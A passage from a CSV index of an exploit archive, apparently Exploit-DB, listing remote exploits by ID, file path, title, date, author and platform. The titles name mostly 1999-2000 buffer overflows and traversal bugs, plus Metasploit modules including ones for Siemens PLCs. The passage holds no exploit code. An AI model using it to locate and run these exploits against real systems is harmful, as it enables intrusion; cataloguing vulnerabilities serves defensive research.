Explorer 5 / Netscape Communicator 4.0/4.5/4.6 - JavaScript STYLE",1999-09-13,"Georgi Guninski",multiple,remote, -19493,exploits/multiple/remote/19493.txt,"Netscape Enterprise Server 3.51/3.6 SP2 - Accept Buffer Overflow",1999-09-13,"Nobuo Miwa",multiple,remote, -19494,exploits/windows/remote/19494.c,"NetcPlus SmartServer 3.5.1 - SMTP Buffer Overflow",1999-09-13,UNYUN,windows,remote, -19495,exploits/windows/remote/19495.c,"Computalynx CMail 2.3 SP2/2.4 - SMTP Buffer Overflow",1999-09-13,UNYUN,windows,remote, -19496,exploits/windows/remote/19496.c,"FuseWare FuseMail 2.7 - POP Mail Buffer Overflow",1999-09-13,UNYUN,windows,remote, -19503,exploits/linux/remote/19503.txt,"ProFTPd 1.2 pre6 - 'snprintf' Remote Root",1999-09-17,"Tymm Twillman",linux,remote, -19514,exploits/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote, -19515,exploits/windows/remote/19515.txt,"Microsoft Internet Explorer 4 (Windows 95/NT 4.0) - Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote, -19520,exploits/bsd/remote/19520.txt,"BSD - 'TelnetD' Remote Command Execution (2)",2012-07-01,kingcope,bsd,remote, -19521,exploits/windows/remote/19521.txt,"Microsoft Internet Explorer 5.0/4.0.1 - hhopen OLE Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote, -19522,exploits/linux/remote/19522.txt,"Linux Kernel 2.2 - Predictable TCP Initial Sequence Number",1999-09-27,"Stealth & S. Krahmer",linux,remote, -19530,exploits/windows/remote/19530.txt,"Microsoft Internet Explorer 5 - Download Behaviour",1999-09-27,"Georgi Guninski",windows,remote, -19532,exploits/aix/remote/19532.pl,"IBM AIX 4.3.2 - 'ftpd' Remote Buffer Overflow",1999-09-28,Gerrie,aix,remote, -19537,exploits/windows/remote/19537.txt,"teamshare teamtrack 3.0 - Directory Traversal",1999-10-02,"rain forest puppy",windows,remote, -19538,exploits/hardware/remote/19538.txt,"Hybrid Networks Cable Broadband Access System 1.0 - Remote Configuration",1999-10-05,KSR[T],hardware,remote, -19539,exploits/windows/remote/19539.txt,"Microsoft Internet Explorer 5.0/4.0.1 - iFrame",1999-10-11,"Georgi Guninski",windows,remote, -19540,exploits/windows/remote/19540.txt,"t. hauck jana WebServer 1.0/1.45/1.46 - Directory Traversal",1999-10-08,"Jason Lutz",windows,remote, -19553,exploits/php/remote/19553.txt,"PHP/FI 1.0/FI 2.0/FI 2.0 b10 - mylog/mlog",1997-10-19,"Bryan Berg",php,remote, -19554,exploits/hardware/remote/19554.c,"Lucent Ascend MAX 5.0/Pipeline 6.0/TNT 1.0/2.0 Router - MAX UDP Port 9 (1)",1998-03-16,Rootshell,hardware,remote, -19555,exploits/hardware/remote/19555.pl,"Lucent Ascend MAX 5.0/Pipeline 6.0/TNT 1.0/2.0 Router - MAX UDP Port 9 (2)",1998-03-17,Rootshell,hardware,remote, -19557,exploits/linux/remote/19557.txt,"John S.2 Roberts AnyForm 1.0/2.0 - CGI Semicolon",1995-07-31,"Paul Phillips",linux,remote, -19558,exploits/linux/remote/19558.c,"OpenLink Software OpenLink 3.2 - Remote Buffer Overflow",1999-10-15,"Tymm Twillman",linux,remote, -19559,exploits/windows/remote/19559.txt,"Microsoft Internet Explorer 5.0/4.0.1 - JavaScript URL Redirection (MS99-043)",1999-10-18,"Georgi Guninski",windows,remote, -19560,exploits/multiple/remote/19560.c,"Washington University WU-FTPD 2.5.0 - 'message' Remote Buffer Overflow",1999-10-19,typo/teso,multiple,remote, -19561,exploits/windows/remote/19561.c,"True North Software Internet Anywhere Mail Server 2.3.x - Mail Server Multiple Buffer Overflow",1999-10-01,"Arne Vidstrom",windows,remote, -19566,exploits/windows/remote/19566.c,"Omnicron OmniHTTPd 1.1/2.4 Pro - Remote Buffer Overflow",1999-10-22,UNYUN,windows,remote, -19567,exploits/linux/remote/19567.txt,"National Science Foundation Squid Web Proxy 1.0/1.1/2.1 - Authentication Failure",1999-10-25,"Oezguer Kesim",linux,remote, -19568,exploits/windows/remote/19568.txt,"Pacific Software URL Live! 1.0 - Directory Traversal",1999-10-28,UNYUN,windows,remote, -19570,exploits/windows/remote/19570.txt,"WFTPD 2.34/2.40/3.0 - Remote Buffer Overflow",1999-11-04,"Alberto Solino",windows,remote, -19576,exploits/windows/remote/19576.rb,"IBM Rational ClearQuest CQOle - Remote Code Execution (Metasploit)",2012-07-05,Metasploit,windows,remote, -19580,exploits/windows/remote/19580.txt,"Avirt Gateway Suite 3.3 a/3.5 - Mail Server Buffer Overflow (1)",1999-10-31,"Luck Martins",windows,remote, -19581,exploits/windows/remote/19581.txt,"Avirt Gateway Suite 3.3 a/3.5 - Mail Server Buffer Overflow (2)",1999-10-31,"dark spyrit",windows,remote, -19584,exploits/windows/remote/19584.c,"Sky Communications Skyfull 1.1.4 Mail Server - MAIL FROM Buffer Overflow",1999-10-30,UNYUN,windows,remote, -19586,exploits/windows/remote/19586.c,"BTD Studio Zom-Mail 1.0.9 - Remote Buffer Overflow",1999-11-02,UNYUN,windows,remote, -19587,exploits/windows/remote/19587.txt,"AN-HTTPd 1.2b - CGI s",1999-11-02,UNYUN,windows,remote, -19588,exploits/windows/remote/19588.c,"IBM HomePagePrint 1.0 7 - Remote Buffer Overflow",1999-11-02,UNYUN,windows,remote, -19589,exploits/windows/remote/19589.txt,"Avirt Gateway Suite 3.3/3.3 a/3.5 - Directory Creation",1999-10-31,"Jesús López de Aguileta",windows,remote, -19591,exploits/windows/remote/19591.txt,"Microsoft Internet Explorer 4/5 / Outlook 98 - 'window.open' Redirect",1999-11-04,"Georgi Guninski",windows,remote, -19592,exploits/windows/remote/19592.asm,"Real Networks GameHouse dldisplay ActiveX control - Port Buffer Overflow (1)",1999-11-04,"dark spyrit",windows,remote, -19593,exploits/windows/remote/19593.c,"Real Networks GameHouse dldisplay ActiveX control - Port Buffer Overflow (2)",1999-11-04,"dark spyrit",windows,remote, -19595,exploits/windows/remote/19595.c,"Computer Software Manufaktur Alibaba 2.0 - Multiple CGI Vulnerabilities",1999-11-03,Kerb,windows,remote, -19603,exploits/windows/remote/19603.txt,"Microsoft Internet Explorer 4.x/5 / Outlook 2000 0/98 0/Express 4.x - ActiveX '.CAB' File Execution",1999-11-08,Mukund,windows,remote, -20122,exploits/windows/remote/20122.rb,"Microsoft Office SharePoint Server 2007 - Remote Code Execution (MS10-104) (Metasploit)",2012-07-31,Metasploit,windows,remote,8082 -20120,exploits/windows/remote/20120.pl,"httpdx 1.5.4 - Remote Heap Overflow",2012-07-29,st3n,windows,remote, -19903,exploits/multiple/remote/19903.txt,"Gossamer Threads DBMan 2.0.4 - DBMan Information Leakage",2000-05-05,"Black Watch Labs",multiple,remote, -19607,exploits/windows/remote/19607.c,"Microsoft Windows 95/98 - UNC Buffer Overflow (1)",1999-11-09,UNYUN,windows,remote, -19608,exploits/windows/remote/19608.c,"Microsoft Windows 95/98 - UNC Buffer Overflow (2)",1999-11-09,UNYUN,windows,remote, -19611,exploits/windows/remote/19611.txt,"TransSoft Broker FTP Server 3.0 x/4.0 - User Name Buffer Overflow",1999-11-08,"Ussr Labs",windows,remote, -19612,exploits/windows/remote/19612.pl,"Trend Micro Interscan VirusWall 3.2.3/3.3 - 'HELO' Remote Buffer Overflow (1)",1999-11-07,"Alain Thivillon & Stephane Aubert",windows,remote, -19613,exploits/windows/remote/19613.rb,"Poison Ivy 2.3.2 (C2 Server) - Remote Buffer Overflow (Metasploit)",2012-07-06,Metasploit,windows,remote,3460 -19614,exploits/windows/remote/19614.asm,"Trend Micro Interscan VirusWall 3.2.3/3.3 - 'HELO' Remote Buffer Overflow (2)",1999-11-07,"dark spyrit",windows,remote, -19617,exploits/windows/remote/19617.txt,"NetcPlus SmartServer3 3.5.1 - POP Buffer Overflow",1999-11-11,"Ussr Labs",windows,remote, -19618,exploits/windows/remote/19618.txt,"Microsoft Internet Explorer 5 Media Player - ActiveX Error Message",1999-11-14,"Georgi Guninski",windows,remote, -19620,exploits/unix/remote/19620.txt,"Matt Wright - 'FormHandler.cgi' 2.0 Reply Attachment",1999-11-16,m4rcyS,unix,remote, -19621,exploits/windows/remote/19621.c,"Admiral Systems EmailClub 1.0.0.5 - Remote Buffer Overflow",1999-11-15,UNYUN,windows,remote, -19622,exploits/windows/remote/19622.c,"Antelope Software W4-Server 2.6 a/Win32 - 'Cgitest.exe' Remote Buffer Overflow",1999-11-15,UNYUN,windows,remote, -19623,exploits/windows/remote/19623.c,"International TeleCommunications WebBBS 2.13 - login & Password Buffer Overflow",1999-11-15,UNYUN,windows,remote, -19625,exploits/windows/remote/19625.py,"ALLMediaServer 0.8 - Remote Overflow (SEH)",2012-07-06,"motaz reda",windows,remote,888 -19632,exploits/hardware/remote/19632.txt,"Tektronix Phaser Network Printer 740/750/750DP/840/930 PhaserLink WebServer - Retrieve Administrator Password",1999-11-17,"Dennis W. Mattison",hardware,remote, -19634,exploits/linux/remote/19634.c,"ETL Delegate 5.9.x/6.0.x - Remote Buffer Overflow",1999-11-13,scut,linux,remote, -19637,exploits/windows/remote/19637.txt,"Microsoft Internet Explorer 5 (Windows 95/98/2000/NT 4.0) - XML HTTP Redirect",1999-11-22,"Georgi Guninksi",windows,remote, -19644,exploits/multiple/remote/19644.txt,"symantec mail-gear 1.0 - Directory Traversal",1999-11-29,"Ussr Labs",multiple,remote, -19645,exploits/unix/remote/19645.c,"Qualcomm qpopper 3.0/3.0 b20 - Remote Buffer Overflow (1)",1999-11-30,Mixter,unix,remote, -19646,exploits/unix/remote/19646.pl,"Qualcomm qpopper 3.0/3.0 b20 - Remote Buffer Overflow (2)",1999-11-30,"Synnergy Networks",unix,remote, -19662,exploits/windows/remote/19662.txt,"Microsoft Internet Explorer 4.1/5.0/4.0.1 - Subframe Spoofing",1999-11-30,"Georgi Guninski",windows,remote, -19663,exploits/solaris/remote/19663.c,"Solaris 2.3/2.4/2.5/2.5.1/2.6/7.0 snoop - 'print_domain_name' Remote Buffer Overflow",1999-12-07,K2,solaris,remote, -19667,exploits/multiple/remote/19667.c,"WolfPack Development XSHIPWARS 1.0/1.2.4 - Remote Buffer Overflow",1999-12-09,"Amanda Woodward",multiple,remote, -19668,exploits/solaris/remote/19668.c,"Solaris 2.5/2.5.1/2.6/7.0 - 'sadmind' Remote Buffer Overflow (1)",1999-06-24,"Cheez Whiz",solaris,remote, -19669,exploits/solaris/remote/19669.c,"Solaris 2.5/2.5.1/2.6/7.0 - 'sadmind' Remote Buffer Overflow (2)",1999-06-24,"Cheez Whiz",solaris,remote, -19670,exploits/solaris/remote/19670.c,"Solaris 2.5/2.5.1/2.6/7.0 - 'sadmind' Remote Buffer Overflow (3)",2000-11-10,"nikolai abromov",solaris,remote, -19672,exploits/solaris/remote/19672.c,"Solaris 2.5/2.5.1/2.6/7.0 - 'sadmind' Remote Buffer Overflow (4)",1999-12-10,"Cheez Whiz",solaris,remote, -19679,exploits/windows/remote/19679.txt,"Infoseek Ultraseek 2.1/3.1 for NT - GET Buffer Overflow",1999-12-15,"Ussr Labs",windows,remote, -19680,exploits/sco/remote/19680.c,"SCO Unixware 7.1 - i2odialogd Remote Buffer Overflow",1999-12-22,"Brock Tellier",sco,remote, -19682,exploits/novell/remote/19682.txt,"Netscape Enterprise Server / Novell Groupwise 5.2/5.5 - 'GWWEB.EXE' Multiple Vulnerabilities",1999-12-19,"Sacha Faust Bourque",novell,remote, -19686,exploits/multiple/remote/19686.txt,"Microsoft Internet Explorer 4/5/5.5/5.0.1 - external.NavigateAndFind() Cross-Frame",1999-12-22,"Georgi Guninski",multiple,remote, -19688,exploits/windows/remote/19688.txt,"ZBServer Pro 1.5 - Remote Buffer Overflow (1)",1999-12-23,"Ussr Labs",windows,remote, -19689,exploits/windows/remote/19689.c,"ZBServer Pro 1.5 - Remote Buffer Overflow (2)",1999-12-23,Izan,windows,remote, -19690,exploits/unix/remote/19690.txt,"glFTPd 1.17.2 - Code Execution",1999-12-23,suid,unix,remote, -19691,exploits/multiple/remote/19691.pl,"Tony Greenwood WebWho+ 1.1 - Remote Command Execution",1999-12-26,loophole,multiple,remote, -19694,exploits/unix/remote/19694.txt,"AltaVista Search Intranet 2.0 b/2.3 - Directory Traversal",1999-12-29,"Rudi Carell",unix,remote, -19696,exploits/solaris/remote/19696.c,"Hughes Technologies Mini SQL (mSQL) 2.0.11 - 'w3-msql' Remote Buffer Overflow",1999-10-28,Zhodiac,solaris,remote, -19705,exploits/unixware/remote/19705.c,"Netscape FastTrack Server 2.0.1a - GET Buffer Overflow",1999-12-31,"Brock Tellier",unixware,remote, -19708,exploits/php/remote/19708.php,"PHP 3.0.13 - 'Safe_mode' Failure",2000-01-04,"Kristian Koehntopp",php,remote, -19712,exploits/multiple/remote/19712.txt,"Allaire ColdFusion Server 4.0/4.0.1 - 'CFCACHE' Information Disclosure",2000-01-04,anonymous,multiple,remote, -19713,exploits/cgi/remote/19713.pl,"Solution Scripts Home Free 1.0 - 'search.cgi' Directory Traversal",2000-01-03,"k0ad k1d",cgi,remote, -40086,exploits/ruby/remote/40086.rb,"Ruby on Rails ActionPack Inline ERB - Code Execution (Metasploit)",2016-07-11,Metasploit,ruby,remote,80 -19717,exploits/java/remote/19717.rb,"Java Applet - Field Bytecode Verifier Cache Remote Code Execution (Metasploit)",2012-07-11,Metasploit,java,remote, -19718,exploits/windows/remote/19718.rb,"AdminStudio - 'LaunchHelp.dll' ActiveX Arbitrary Code Execution (Metasploit)",2012-07-11,Metasploit,windows,remote, -19719,exploits/windows/remote/19719.txt,"Microsoft Internet Explorer 4.0/4.0.1/5.0/5.0.1/5.5 - preview Security Zone Settings Lag",2000-01-07,"Georgi Guninski",windows,remote, -19722,exploits/unix/remote/19722.txt,"RedHat 6.1 / IRIX 6.5.18 - 'lpd' Command Execution",2000-01-11,anonymous,unix,remote, -19724,exploits/windows/remote/19724.txt,"Mirabilis ICQ 0.99b 1.1.1.1/3.19 - Remote Buffer Overflow",2000-01-12,"Drew Copley",windows,remote, -19729,exploits/linux/remote/19729.c,"Qualcomm qpopper 3.0 - 'LIST' Remote Buffer Overflow",2000-01-10,Zhodiac,linux,remote, -19730,exploits/windows/remote/19730.c,"A-V Tronics InetServ 3.0 - WebMail GET",2000-01-17,"Greg Hoglund",windows,remote, -19731,exploits/windows/remote/19731.c,"Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - Directory Traversal",2000-01-26,fredrik.widlund,windows,remote, -19732,exploits/multiple/remote/19732.html,"Check Point Software Firewall-1 3.0 Script - Tag Checking Bypass",2000-01-29,"Arne Vidstrom",multiple,remote, -19734,exploits/windows/remote/19734.java,"Microsoft Virtual Machine 2000 - Series/3000 Series getSystemResource",2000-01-31,"Hiromitsu Takagi",windows,remote, -19889,exploits/windows/remote/19889.c,"Microsoft Windows 95/98 - NetBIOS NULL Name",2000-05-02,"rain forest puppy",windows,remote, -19737,exploits/windows/remote/19737.c,"H. Nomura Tiny FTPDaemon 0.52 - Multiple Buffer Overflow Vulnerabilities",2000-02-01,UNYUN,windows,remote, -19738,exploits/windows/remote/19738.txt,"Microsoft Outlook Express 5 - JavaScript Email Access",2000-02-01,"Georgi Guninski",windows,remote, -19741,exploits/cgi/remote/19741.pl,"Wired Community Software WWWThreads 5.0 - SQL Command Input",2000-02-03,"rain forest puppy",cgi,remote, -19742,exploits/multiple/remote/19742.txt,"Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 - Directory Traversal (MS00-006)",2000-02-02,Mnemonix,multiple,remote, -19743,exploits/windows/remote/19743.txt,"Cat Soft Serv-U FTP Server 2.5/a/b (Windows 95/98/2000/NT 4.0) - Shortcut",2000-02-04,"Ussr Labs",windows,remote, -19745,exploits/cgi/remote/19745.txt,"Daniel Beckham The Finger Server 0.82 Beta - Pipe",2000-02-04,"Iain Wade",cgi,remote, -19747,exploits/cgi/remote/19747.txt,"Zeus Web Server 3.x - Null Terminated Strings",2000-02-08,"Vanja Hrustic",cgi,remote, -19749,exploits/multiple/remote/19749.txt,"ISC BIND 4.9.7/8.x - Traffic Amplification and NS Route Discovery",2000-02-14,Sebastian,multiple,remote, -19751,exploits/multiple/remote/19751.txt,"Ascom COLTSOHO / Brocade Fabric OS / MatchBox / Win98/NT4 / Solaris / Xyplex - SNMP World Writeable Community",2000-02-15,"Michal Zalewski",multiple,remote, -19753,exploits/windows/remote/19753.txt,"Microsoft FrontPage Personal Web Server 1.0/4.0 - Directory Traversal",1996-01-17,kiborg,windows,remote, -19761,exploits/windows/remote/19761.txt,"Sambar Server 4.2 Beta 7 - Batch CGI",2000-02-24,"Georich Chorbadzhiyski",windows,remote, -19781,exploits/multiple/remote/19781.sh,"Alex Heiphetz Group eZshopper 3.0 - Remote Command Execution",2000-02-27,suid,multiple,remote, -19784,exploits/multiple/remote/19784.txt,"Axis Communications StorPoint CD - Authentication Bypass",2000-03-01,"Infosec Swedish based tigerteam",multiple,remote, -19785,exploits/unix/remote/19785.txt,"The ht://Dig Group ht://Dig 3.1.1/3.1.2/3.1.3/3.1.4/3.2 .0b1 - Arbitrary File Inclusion",2000-02-29,"Geoff Hutchison",unix,remote, -19786,exploits/cgi/remote/19786.txt,"DNSTools Software DNSTools 1.0.8/1.10 - Input Validation",2000-03-02,"Jonathan Leto",cgi,remote, -19788,exploits/irix/remote/19788.pl,"SGI InfoSearch 1.0 / SGI IRIX 6.5.x - fname",2000-03-05,rpc,irix,remote, -19830,exploits/windows/remote/19830.txt,"Microsoft Index Server 2.0 - '%20' ASP Source Disclosure",2000-03-31,"David Litchfield",windows,remote, -19795,exploits/cgi/remote/19795.txt,"Caldera OpenLinux 2.3 - rpm_query CGI",2000-03-05,harikiri,cgi,remote, -19797,exploits/unix/remote/19797.txt,"Sun StarOffice 5.1 - Arbitrary File Read",2000-03-09,"Vanja Hrustic",unix,remote, -19800,exploits/multiple/remote/19800.c,"Check Point Software Firewall-1 3.0/1 4.0 / Cisco PIX Firewall 4.x/5.x - 'ALG' Client",2000-03-10,"Dug Song",multiple,remote, -19801,exploits/linux/remote/19801.c,"Michael Sandrof IrcII 4.4-7 - Remote Buffer Overflow",2000-03-10,bladi,linux,remote, -19805,exploits/windows/remote/19805.txt,"GameHouse dldisplay - ActiveX control 0 / Real Server 5.0/7.0 Internal IP Address Disclosure",2000-03-08,tschweikle,windows,remote, -19808,exploits/cgi/remote/19808.txt,"Generation Terrorists Designs & Concepts Sojourn 2.0 - File Access",2000-03-14,"Cerberus Security Team",cgi,remote, -19809,exploits/windows/remote/19809.txt,"Oracle Web Listener 4.0.x - for NT Batch File",2000-03-15,"Cerberus Security Team",windows,remote, -19814,exploits/multiple/remote/19814.c,"Netscape Enterprise Server 3.0/3.6/3.51 - Directory Indexing",2000-03-17,"Gabriel Maggiotti",multiple,remote, -19815,exploits/windows/remote/19815.txt,"vqsoft vqserver for windows 1.9.9 - Directory Traversal",2000-03-21,"Johan Nilsson",windows,remote, -19819,exploits/windows/remote/19819.txt,"GeoCel WindMail 3.0 - Remote File Read",2000-03-27,"Quan Peng",windows,remote, -19822,exploits/irix/remote/19822.c,"SGI IRIX 5.x/6.x - Objectserver",2000-03-29,"Last Stage of Delirium",irix,remote, -19824,exploits/multiple/remote/19824.txt,"Microsoft IIS 4.0 - UNC Mapped Virtual Host",2000-03-30,"Adam Coyne",multiple,remote, -19828,exploits/multiple/remote/19828.txt,"Cobalt RaQ 2.0/3.0 - Apache .htaccess Disclosure",2000-03-31,"Paul Schreiber",multiple,remote, -19831,exploits/hardware/remote/19831.rb,"Siemens Simatic S7-300/400 - CPU START/STOP Module (Metasploit)",2012-07-14,"Dillon Beresford",hardware,remote,102 -19832,exploits/hardware/remote/19832.rb,"Siemens Simatic S7-300 - PLC Remote Memory Viewer (Metasploit)",2012-07-14,"Dillon Beresford",hardware,remote,8080 -19833,exploits/hardware/remote/19833.rb,"Siemens Simatic S7-1200 - CPU START/STOP Module (Metasploit)",2012-07-14,"Dillon Beresford",hardware,remote, -19842,exploits/cgi/remote/19842.txt,"TalentSoft Web+ 4.x - Directory Traversal",2000-04-12,"John P. McNeely",cgi,remote, -19844,exploits/cgi/remote/19844.txt,"CNC Technology BizDB 1.0 - 'bizdb-search.cgi' Remote Command Execution",2000-04-13,"PErfecto Technology",cgi,remote, -19845,exploits/windows/remote/19845.pl,"Microsoft FrontPage 98 Server Extensions for IIS / Microsoft InterDev 1.0 - Filename Obfuscation",2000-04-14,"rain forest puppy",windows,remote, -19846,exploits/windows/remote/19846.pl,"Microsoft FrontPage 98 Server Extensions for IIS / Microsoft InterDev 1.0 - Remote Buffer Overflow",2000-04-14,"Richie & Beto",windows,remote, -19847,exploits/unix/remote/19847.c,"UoW IMAPd Server 10.234/12.264 - Remote Buffer Overflow",2002-08-01,"Gabriel A. Maggiotti",unix,remote, -19848,exploits/unix/remote/19848.pm,"UoW IMAPd Server 10.234/12.264 - LSUB Buffer Overflow (Metasploit)",2000-04-16,vlad902,unix,remote, -19849,exploits/unix/remote/19849.pm,"UoW IMAPd Serve 10.234/12.264 - COPY Buffer Overflow (Metasploit)",2000-04-16,vlad902,unix,remote, -19852,exploits/cgi/remote/19852.txt,"Dansie Shopping Cart 3.0.4 - Multiple Vulnerabilities",2000-04-14,"tombow & Randy Janinda",cgi,remote, -19857,exploits/windows/remote/19857.rb,"ALLMediaServer 0.8 - Remote Buffer Overflow (Metasploit)",2012-07-16,Metasploit,windows,remote,888 -19905,exploits/unix/remote/19905.pl,"John Donoghue Knapster 0.9/1.3.8 - File Access",2000-05-13,no_maam,unix,remote, -19868,exploits/linux/remote/19868.c,"LCDProc 0.4 - Remote Buffer Overflow",2000-04-23,"Andrew Hobgood",linux,remote, -19871,exploits/windows/remote/19871.txt,"Zone Labs ZoneAlarm 2.1 Personal Firewall - Port 67",2000-04-24,"Wally Whacker",windows,remote, -19877,exploits/windows/remote/19877.txt,"FrontPage 98/Personal WebServer 1.0 / Personal Web Server 2.0 - 'htimage.exe' File Existence Disclosure",2000-04-19,Narrow,windows,remote, -19879,exploits/linux/remote/19879.txt,"RedHat 6.2 Piranha Virtual Server Package - Default Account and Password",2000-04-24,"Max Vision",linux,remote, -19881,exploits/windows/remote/19881.txt,"McMurtrey/Whitaker & Associates Cart32 2.6/3.0 - Remote Administration Password",2000-04-27,"Cerberus Security Team",windows,remote, -19882,exploits/hardware/remote/19882.pl,"Cisco IOS 11.x/12.x - HTTP %%",2000-04-26,"Keith Woodworth",hardware,remote, -19886,exploits/multiple/remote/19886.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 Beta - Mail Logging Buffer Overflow (1)",2000-05-02,FuSyS,multiple,remote, -19887,exploits/multiple/remote/19887.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 Beta - Mail Logging Buffer Overflow (2)",2000-05-02,MaXX,multiple,remote, -19888,exploits/multiple/remote/19888.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 Beta - Mail Logging Buffer Overflow (3)",2002-01-18,g463,multiple,remote, -19890,exploits/cgi/remote/19890.txt,"ultrascripts ultraboard 1.6 - Directory Traversal",2000-05-03,"Rudi Carell",cgi,remote, -19891,exploits/linux/remote/19891.c,"Ethereal 0.8.4/0.8.5/0.8.6 / tcpdump 3.4/3.5 alpha - DNS Decode (1)",1999-05-31,"Hugo Breton",linux,remote, -19892,exploits/linux/remote/19892.txt,"Ethereal 0.8.4/0.8.5/0.8.6 / tcpdump 3.4/3.5 alpha - DNS Decode (2)",1999-05-31,scut,linux,remote, -19893,exploits/windows/remote/19893.c,"L-Soft Listserv 1.8 - Web Archives Buffer Overflow",2000-05-01,"David Litchfield",windows,remote, -19895,exploits/windows/remote/19895.txt,"NetWin DNews 5.3 Server - Remote Buffer Overflow",2000-03-01,Joey__,windows,remote, -19897,exploits/windows/remote/19897.txt,"FrontPage 2000 / IIS 4.0/5.0 - Server Extensions Full Path Disclosure",2000-05-06,"Frankie Zie",windows,remote, -19901,exploits/hardware/remote/19901.txt,"Netopia R-series Routers 4.6.2 - Modifying SNMP Tables",2000-05-16,"Stephen Friedl",hardware,remote, -19906,exploits/multiple/remote/19906.txt,"Matt Wright FormMail 1.6/1.7/1.8 - Environmental Variables Disclosure",2000-05-10,"Black Watch Labs",multiple,remote, -19908,exploits/windows/remote/19908.txt,"Microsoft IIS 4.0/5.0 - Malformed Filename Request",2000-05-11,"Cerberus Security Team",windows,remote, -19909,exploits/cgi/remote/19909.pl,"Mozilla Bugzilla 2.4/2.6/2.8/2.10 - Arbitrary Command Execution",2000-05-11,"Frank van Vliet karin",cgi,remote, -19913,exploits/cgi/remote/19913.txt,"George Burgyan CGI Counter 4.0.2/4.0.7 - Input Validation",2000-05-15,"Howard M. Kash III",cgi,remote, -19914,exploits/windows/remote/19914.txt,"Seattle Lab Software Emurl 2.0 - Email Account Access",2000-05-15,"Pierre Benoit",windows,remote, -19916,exploits/multiple/remote/19916.c,"Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow (1)",2000-05-16,"Hugo Breton",multiple,remote, -19917,exploits/multiple/remote/19917.c,"Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow (2)",2000-05-16,L0pht,multiple,remote, -19918,exploits/multiple/remote/19918.c,"Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow (3)",2000-05-16,L0pht,multiple,remote, -19921,exploits/cgi/remote/19921.txt,"Matt Kruse Calendar Script 2.2 - Arbitrary Command Execution",2000-05-16,suid,cgi,remote, -19922,exploits/windows/remote/19922.pl,"Internet Security Systems ICECap Manager 2.0.23 - Default Username and Password",2000-05-17,"rain forest puppy",windows,remote, -19924,exploits/bsd/remote/19924.c,"Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Remote Buffer Overflow (1)",2000-05-16,duke,bsd,remote, -19926,exploits/linux/remote/19926.c,"Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Remote Buffer Overflow (3)",2000-04-08,"Jim Paris",linux,remote, -19928,exploits/windows/remote/19928.txt,"Microsoft Active Movie Control 1.0 - Filetype",2000-05-13,http-equiv,windows,remote, -19966,exploits/linux/remote/19966.c,"Marty Bochane MDBms 0.9 - xbx Buffer Overflow",2000-05-24,"HaCk-13 TeaM",linux,remote, -19931,exploits/windows/remote/19931.rb,"Novell ZENworks Configuration Management Preboot Service 0x06 - Remote Buffer Overflow (Metasploit)",2012-07-19,Metasploit,windows,remote,998 -19932,exploits/windows/remote/19932.rb,"Novell ZENworks Configuration Management Preboot Service 0x21 - Remote Buffer Overflow (Metasploit)",2012-07-19,Metasploit,windows,remote,998 -19937,exploits/windows/remote/19937.pl,"Simple Web Server 2.2 rc2 - Remote Buffer Overflow",2012-07-19,mr.pr0n,windows,remote, -19939,exploits/windows/remote/19939.html,"Microsoft Internet Explorer 4.0/5.0/5.5 preview/5.0.1 - DocumentComplete() Cross Frame Access",2000-05-17,"Andrew Nosenko",windows,remote, -19942,exploits/windows/remote/19942.txt,"Fortech Proxy+ 2.30 - Remote Administration",1999-12-26,anonymous,windows,remote, -19943,exploits/hardware/remote/19943.txt,"Intel Corporation Express 8100 ISDN Router - Fragmented ICMP",1990-05-19,"Dimuthu Parussalla",hardware,remote, -19944,exploits/multiple/remote/19944.pl,"Lotus Domino Enterprise Server 5.0.1/5.0.2/5.0.3 / Mail Server 5.0.1/5.0.2/5.0.3 - Remote Buffer Overflow",2000-05-18,smiler,multiple,remote, -19945,exploits/multiple/remote/19945.txt,"MetaProducts Offline Explorer 1.0 x/1.1 x/1.2 x - Directory Traversal",2000-05-19,Wyzewun,multiple,remote, -19947,exploits/linux/remote/19947.c,"gdm 1.0.x/2.0.x BETA/2.2.0 - XDMCP Buffer Overflow (1)",2000-05-22,"Chris Evans",linux,remote, -19948,exploits/linux/remote/19948.c,"gdm 1.0.x/2.0.x BETA/2.2.0 - XDMCP Buffer Overflow (2)",2000-05-22,AbraxaS,linux,remote, -19949,exploits/irix/remote/19949.c,"Gauntlet Firewall 4.1/4.2/5.0 / Webshield E-ppliance 100.0/300.0 / IRIX 6.5.x - Remote Buffer Overflow",2000-05-18,_Gramble_,irix,remote, -19951,exploits/cgi/remote/19951.php,"QuickCommerce 2.5/3.0 / Cart32 2.5 a/3.0 / Shop Express 1.0 / StoreCreator 3.0 Web Shopping Cart - Hidden Form Field",2000-02-01,CDI,cgi,remote, -19956,exploits/cgi/remote/19956.txt,"HP JetAdmin 5.5.177/jetadmin 5.6 - Directory Traversal",2000-05-24,"Ussr Labs",cgi,remote,8000 -19957,exploits/windows/remote/19957.txt,"Pacific Software Carello 1.2.1 - File Duplication / Source Disclosure",2000-05-24,"Cerberus Security Team",windows,remote, -19958,exploits/windows/remote/19958.rb,"Novell ZENworks Configuration Management Preboot Service - 0x6c Buffer Overflow (Metasploit)",2012-07-20,Metasploit,windows,remote, -19959,exploits/windows/remote/19959.rb,"Novell ZENworks Configuration Management Preboot Service - 0x4c Buffer Overflow (Metasploit)",2012-07-20,Metasploit,windows,remote,998 -19973,exploits/windows/remote/19973.txt,"Fastraq Mailtraq 1.1.4 - Multiple Path Vulnerabilities",2000-03-22,Slash,windows,remote, -19975,exploits/windows/remote/19975.pl,"Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 - Root Directory Access",2000-05-31,"H D Moore",windows,remote, -19976,exploits/windows/remote/19976.txt,"Concatus IMate Web Mail Server 2.5 - Remote Buffer Overflow",2000-06-01,"Delphis 